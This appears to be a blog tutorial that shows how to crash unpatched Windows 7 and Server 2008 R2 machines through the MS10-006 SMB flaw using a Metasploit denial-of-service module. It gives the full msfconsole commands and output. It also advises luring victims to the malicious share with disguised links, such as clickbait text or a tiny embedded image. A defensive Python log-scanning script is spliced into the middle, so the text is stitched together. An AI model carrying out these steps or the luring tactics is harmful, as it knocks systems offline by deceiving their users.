Most Metasploit guides cover Windows XP, Windows Server 2003 and older versions of Windows, which are slowly being phased out. More and more people use Windows 7 as their desktop operating system and Windows Server 2008 R2 for corporate purposes. The purpose of this guide is to show how a simple SMB infinite-loop vulnerability can be used with Metasploit to crash Windows Server 2008 R2 and Windows 7, i.e. to perform a denial-of-service (DoS) attack. I tested this against a fresh Windows 7 install (no patches or service packs) and a fresh Windows Server 2008 R2 install (no patches or service packs), and in both cases the machine stopped responding completely. You don't even get to click anything. The only way I could get back into Windows was a hard reset (hold the power key and reboot).
The main catch is that most people connect their Windows 7 machines to the Internet and install patches and service packs. But many organizations lock down their servers with no Internet connectivity, or stop them from updating because some updates require a reboot; in a production environment, rebooting a critical server might cause a service interruption. The way I understand it, if you don't take the time to patch your servers and desktops, you are leaving them exposed to the vulnerability and wide open; in other words, you are inviting remote attacks on your vulnerable systems.
Denial-of-service (DoS) attack on Windows 2008 R2 server and Windows 7 with Metasploit
In this guide, I will demonstrate how to exploit Windows 7 and perform a DoS attack on a Windows Server 2008 R2 machine that has not applied the MS10-006 patch (Vulnerabilities in SMB Client Could Allow Remote Code Execution, KB978251). According to Microsoft, the vulnerability affects the following unpatched systems:
- Microsoft Windows 2000,
- Windows XP,
- Windows Server 2003,
- Windows 7, and
- Windows Server 2008 R2
and it is rated Important for:
- Windows Vista and
- Windows Server 2008
WOHAA, that's like everything except Windows NT, ME, 95 and 3.1!!! So if your target hasn't patched this long-lasting issue, maybe they should get a taste of it.
This vulnerability could allow remote code execution if an attacker sends a specially crafted SMB response to a client-initiated SMB request. To exploit it, an attacker must convince the user to initiate an SMB connection to a malicious SMB server. More technical details are in the Microsoft bulletin: MS10-006.
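The client-initiated direction is what a defender can watch for: a workstation should rarely open SMB connections to hosts outside its own file-server network, and one of Microsoft's documented workarounds for MS10-006 is to block TCP ports 139 and 445 at the firewall. The following Python script is an added example and is not part of the original post or of Metasploit: it parses Windows Firewall log records in the standard pfirewall.log field order (the same names the log's own "#Fields:" header carries) and flags outbound SMB connections to addresses outside a trusted range. The sample log lines, the 10.10.10.0/24 trusted network and the IP addresses are constructed for this example.

```python
import ipaddress

# Windows Firewall (pfirewall.log) field order, as listed in the log's own
# "#Fields:" header line.
FIELDS = ("date", "time", "action", "protocol", "src_ip", "dst_ip", "src_port",
          "dst_port", "size", "tcpflags", "tcpsyn", "tcpack", "tcpwin",
          "icmptype", "icmpcode", "info", "path")
SMB_PORTS = {139, 445}

# Constructed sample log: one normal file-server access, two outbound SMB
# connections to Internet addresses, one web request, one inbound connection
# and one malformed line. None of this is real captured traffic.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2014-03-01 10:15:30 ALLOW TCP 10.10.10.50 10.10.10.5 49151 445 0 - 0 0 0 - - - SEND
2014-03-01 10:15:32 ALLOW TCP 10.10.10.50 203.0.113.7 49152 445 0 - 0 0 0 - - - SEND
2014-03-01 10:15:33 ALLOW TCP 10.10.10.50 198.51.100.9 49153 139 0 - 0 0 0 - - - SEND
2014-03-01 10:15:35 ALLOW TCP 10.10.10.50 203.0.113.7 49154 80 0 - 0 0 0 - - - SEND
2014-03-01 10:15:36 ALLOW TCP 203.0.113.7 10.10.10.50 445 49155 0 - 0 0 0 - - - RECEIVE
garbage line that does not match the format
"""


def parse_line(line):
    """Return a dict for one log record, or None for header, blank or malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    try:
        rec["src_ip"] = ipaddress.ip_address(rec["src_ip"])
        rec["dst_ip"] = ipaddress.ip_address(rec["dst_ip"])
    except ValueError:
        return None
    # ICMP records carry "-" in the port columns; keep them as None.
    rec["dst_port"] = int(rec["dst_port"]) if rec["dst_port"].isdigit() else None
    return rec


def find_outbound_smb(log_text, trusted_nets):
    """Return (timestamp, action, src, dst, port) for every outbound TCP connection
    to an SMB port whose destination lies outside the trusted networks."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"] != "SEND" or rec["protocol"] != "TCP":
            continue
        if rec["dst_port"] not in SMB_PORTS:
            continue
        # Address-version mismatches simply fail the membership test.
        if any(rec["dst_ip"] in net for net in nets):
            continue
        hits.append((f'{rec["date"]} {rec["time"]}', rec["action"],
                     str(rec["src_ip"]), str(rec["dst_ip"]), rec["dst_port"]))
    return hits


if __name__ == "__main__":
    for ts, action, src, dst, port in find_outbound_smb(SAMPLE_LOG, ["10.10.10.0/24"]):
        print(f"{ts} {action} {src} -> {dst}:{port}  outbound SMB to untrusted host")
```

An ALLOW record in this output means a client did reach an outside SMB server, which is exactly the precondition the bulletin describes; a DROP record shows the perimeter rule doing its job. Both are worth keeping, so the action column is carried through in each hit.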
In case your target is Windows 2003, you should check the (DoS) Denial-of-service attack on Windows 2003 with Metasploit guide. If you have issues starting Metasploit, or want to start it at system start-up (often a good idea when you use it heavily), you might also read other guides such as start Metasploit framework.
If you are not familiar with Metasploit, you should read the first section of the (DoS) Denial-of-service attack on Windows 2003 with Metasploit guide. It is a particularly good one, as it explains what Metasploit is and how you can use it efficiently.
Now let’s start with the guide.
If you don't have PostgreSQL and Metasploit running already, you need to start them. I suggest you simply enable the postgresql and metasploit services at start-up so that you don't have to type the same commands over and over again. As you can see, I am running Kali Linux (v1.0.6); the following is how you start Metasploit from the command line.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.
root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
root@kali:~# msfconsole
[*] The initial module cache will be built in the background, this can take 2-5 minutes...
[Metasploit ASCII-art banner omitted]
Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
-- type 'go_pro' to launch it now.

       =[ metasploit v4.7.0-2013082802 [core:4.7 api:1.0]
+ -- --=[ 1161 exploits - 641 auxiliary - 180 post
+ -- --=[ 310 payloads - 30 encoders - 8 nops

msf >
Now I have my msfconsole up and running. Let's load the module we are going to use in this tutorial.
Load the SMB loop module
Type the following command to load the module.
msf > use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) >
As you can see from the screenshot below, you can type use auxiliary/dos/windows/smb/ and press the TAB key to list the available modules. We are choosing the one demonstrated here.
The info command shows more details on a module. Try info followed by one module at a time to read about each available module; you will soon get an idea of which one does what and which systems it affects. The following is an example using info.
msf > info auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
Once you are ready, type the following to use the module:
msf > use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
Set options for the module
Now that we are fairly confident about what this module does (from info), let's check what options it has.
Type in the following command to find details.
msf auxiliary(ms10_006_negotiate_response_loop) > show options
As we can see, we only need to set SRVHOST, which is our own IP address (the attacking machine's IP).
My test machine's IP was 10.10.10.12, so I set that now.
msf auxiliary(ms10_006_negotiate_response_loop) > set SRVHOST 10.10.10.12
SRVHOST => 10.10.10.12
As you can see from the screenshot, I used show options twice, before and after the set SRVHOST command. The output shows that SRVHOST was set properly.
Run the Metasploit exploit
Now that everything looks good, we run our Metasploit exploit:
msf auxiliary(ms10_006_negotiate_response_loop) > exploit
[*] Starting the malicious SMB service...
[*] To trigger, the vulnerable client should try to access: \\10.10.10.12\SharedAnything
[*] Server started.
.
.
.
<after my test Windows 7 and Windows 2008 R2 both crashed>
.
clear^C
[-] Auxiliary interrupted by the console user
[*] Server stopped.
[*] Auxiliary module execution completed
msf auxiliary(ms10_006_negotiate_response_loop) > exit
root@kali:~# clear
Once you run the exploit, it generates a shared-folder link that you need to send to your victim. As my own IP was 10.10.10.12, it created the \\10.10.10.12\SharedAnything share.
Now we have the exploit running and we have a victim. But how do we send the link so that we know for sure the victim will click it? Are you going to send a boring, obvious link like \\10.10.10.12\SharedAnything? Maybe not! So we need to make a nice-looking link with attractive text on it.
How about this?
Latest news on Kim Kardashian selfie …wooohooo
So I embedded the link in text in the example here. That might work if your target is into Kim Kardashian.
Or maybe he is into something different. Then just rewrite the line with something like this:
Notice that I embedded the link in the picture and made the picture really small. That means the victim must click on it to enlarge it, and once they have done that, you have already DoS'd them.
It is fairly easy to perform a DoS attack on Windows Server 2008 R2 and Windows 7 using Metasploit in Kali Linux like this, and at the same time it is a bit scary how easy it was. I hope you found this useful and informative. Patch your servers and desktops and stay away from these issues.
- URL: http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html
Thanks for reading. Please share.